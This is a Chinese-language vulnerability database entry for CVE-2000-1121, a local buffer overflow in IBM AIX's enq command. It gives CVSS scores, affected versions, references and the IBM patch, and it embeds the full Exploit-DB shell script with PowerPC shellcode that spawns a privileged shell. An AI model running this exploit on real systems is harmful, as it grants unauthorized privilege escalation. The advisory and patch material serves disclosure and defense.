CVE-2000-1121
CVSS7.2
发布时间 :2001-01-09 00:00:00
修订时间 :2016-10-17 22:08:40
NMCOE    

[原文]Buffer overflow in enq command in IBM AIX 4.3.x and earlier may allow local users to execute arbitrary commands via a long -M argument.


[CNNVD]AIX enq本地缓冲区溢出漏洞(CNNVD-200101-010)

        
        AIX是一款由IBM公司开发和维护的UNIX操作系统。
        AIX包含的enq对命令行参数解析不正确,本地攻击者可以利用这个漏洞以ROOT权限在系统上执行任意指令。
        enq程序对用户提交的'-M'参数缺少正确的边界缓冲区检查,攻击者提交超长字符串作为此参数值,可覆盖堆栈部分变量而发生缓冲区溢出,精心构建提交的数据可以以ROOT权限在系统上执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 7.2 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:ibm:aix:4.3IBM AIX 4.3
cpe:/o:ibm:aix:4.3.1IBM AIX 4.3.1
cpe:/o:ibm:aix:4.2IBM AIX 4.2
cpe:/o:ibm:aix:4.3.2IBM AIX 4.3.2
cpe:/o:ibm:aix:4.2.1IBM AIX 4.2.1
cpe:/o:ibm:aix:4.3.3IBM AIX 4.3.3

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1121
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-1121
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200101-010
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=97569466809056&w=2
(UNKNOWN)  BUGTRAQ  20001201 Fixed local AIX V43 vulnerabilities
http://www-1.ibm.com/support/search.wss?rs=0&q=IY08143&apar=only
(UNKNOWN)  AIXAPAR  IY08143
http://www-1.ibm.com/support/search.wss?rs=0&q=IY08287&apar=only
(UNKNOWN)  AIXAPAR  IY08287
http://www.securityfocus.com/bid/2034
(VENDOR_ADVISORY)  BID  2034
http://xforce.iss.net/xforce/xfdb/5619
(UNKNOWN)  XF  aix-enq-bo(5619)

- 漏洞信息

AIX enq本地缓冲区溢出漏洞
高危 未知
2001-01-09 00:00:00 2005-05-02 00:00:00
本地  
        
        AIX是一款由IBM公司开发和维护的UNIX操作系统。
        AIX包含的enq对命令行参数解析不正确,本地攻击者可以利用这个漏洞以ROOT权限在系统上执行任意指令。
        enq程序对用户提交的'-M'参数缺少正确的边界缓冲区检查,攻击者提交超长字符串作为此参数值,可覆盖堆栈部分变量而发生缓冲区溢出,精心构建提交的数据可以以ROOT权限在系统上执行任意指令。
        

- 公告与补丁

        厂商补丁:
        IBM
        ---
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        IBM APAR IY08287
        
        http://techsupport.services.ibm.com/rs6k/fixes.html

- 漏洞信息 (20454)

IBM AIX 4.x enq Buffer Overflow Vulnerability (EDBID:20454)
aix local
2003-04-24 Verified
0 watercloud
N/A [点击下载]
source: http://www.securityfocus.com/bid/2034/info

AIX is a variant of the UNIX Operating System, distributed by IBM. A problem exists that may allow elevation of user priviledges.

The problem occurs in the enq program. It is reported that an overflow exists in the command line argument parsing, which could lead to the overwriting of variables on the stack. This creates the potential for a malicious user to execute arbitrary code, and possibly gain administrative access. 

#!/bin/sh
# FileName: ex_enq_aix4x.sh
# Exploit "enq & qstatus" of Aix4.x to get egid=9 shell.
# Usage   : chmod ex_enq_aix4x.sh ; ./ex_enq_aix4x.sh
# Tested  : on Aix4.3.3
# Author  : watercloud@xfocus.org
# Site    : www.xfocus.org   www.xfocus.net
# Date    : 2003-4-24
# Announce: use as your owner risk!

PERL=/usr/bin/perl
TMP=/tmp/.env.tmp
SHPL=/tmp/.sh.pl
cat >$SHPL<<EOF
#!/usr/bin/perl
\$BUFF="";

\$BUFF.="\x7c\xa5\x2a\x79"x500;

\$OSLEVEL=\`/usr/bin/oslevel\`;
\$ID="\x04";
if( \$OSLEVEL=~/4\.1/ ) {
  \$ID="\x03";
} elsif(\$OSLEVEL=~/4\.3\.3/) {
  \$ID="\x03";
} elsif( \$OSLEVEL=~/4\.2/ ) {
  \$ID="\x02";
}


\$BUFF.="\x7c\xa5\x2a\x79\x40\x82\xff\xfd\x7f\xe8\x02\xa6";
\$BUFF.="\x3b\xff\x01\x20\x38\x7f\xff\x08\x38\x9f\xff\x10";
\$BUFF.="\x90\x7f\xff\x10\x90\xbf\xff\x14\x88\x5f\xff\x0f";
\$BUFF.="\x98\xbf\xff\x0f\x4c\xc6\x33\x42\x44\xff\xff\x02";
\$BUFF.="/bin/sh";



\$BUFF.=\$ID;

print \$BUFF;
EOF

env | awk -F = '{print "unset "$1;}'|grep -v LOGNAME > $TMP
. $TMP
/bin/rm -f $TMP

CC=A`$PERL $SHPL` ; export CC
/bin/rm -f $SHPL
/usr/bin/enq -w"`perl -e 'print "\x2f\xf2\x2b\x10"x600'`"   

#EOF
		

- 漏洞信息

1678
IBM AIX enq -M Argument Local Overflow
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

A local overflow exists in AIX. The enq command fails to validate input parameter -M resulting in a buffer overflow. With a specially crafted request, an attacker can execute arbitrary commands via a long -M argument resulting in a loss of integrity.

- 时间线

2003-02-12 Unknow
2003-02-12 Unknow

- 解决方案

Upgrade AIX using the patch numbers AIX 4.2: APAR IY08287 and AIX 4.3: APAR IY08143 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站